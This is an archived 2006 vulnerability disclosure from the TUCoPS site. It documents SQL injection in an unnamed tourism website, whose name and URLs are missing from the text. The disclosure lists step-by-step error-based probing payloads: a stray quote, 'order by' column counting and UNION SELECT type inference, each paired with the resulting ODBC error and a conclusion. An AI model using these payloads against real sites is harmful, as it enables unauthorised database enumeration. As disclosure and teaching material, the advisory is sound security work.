Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Apps :: b06-1744.htm

SQL Injection in
SQL Injection in
SQL Injection in

Vulnerable Page: 

Found By: Susam Pal

Found On: 29th March, 2006, Wednesday

Vulnerability Type: SQL Injection

Action Taken: Reported to 

Description: is a tourism website. The site is prone to SQL injection which can be exploited to reveal the table 

names, some column names as well as their data types. Exploiting the vulnerability requires some reverse engineering. The ASP 

ODBC error messages can be displayed by passing bad values for the parameters in the URL.

Example URL 1:' 

Error Found: Unclosed quotation mark before the character string ' and mncpage.mnccategoryid = mnccategory.mnccategoryid'. 

Conclusion: Direct SQL Injection is possible. There are 2 tables, 'mncpage' and 'mnccategory'. Both of them have a column 

called 'mnccategoryid'.

Example URL 2: order by 1-- 
Example URL 3: order by 2-- 
Example URL 4: order by 3-- 

Error Found: None

Example URL 5: order by 4-- 

Error Found: The ORDER BY position number 4 is out of range of the number of items in the select list.

Conclusion: The table being used by the query selects 3 columns and one of them is an integer.

Example URL 6: union select 'varchar1', 'varchar2', 'varchar3' 

from mncpage--

Error Found: Syntax error converting the varchar value 'varchar1' to a column of data type int.

Conclusion: The 1st column in the select query is an integer.

Error URL 7: union select mnccategoryid, 'varchar2', 

'varchar3' from mncpage--

Error Found: None

Conclusion: The column 'mnccategory' is of integer type.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH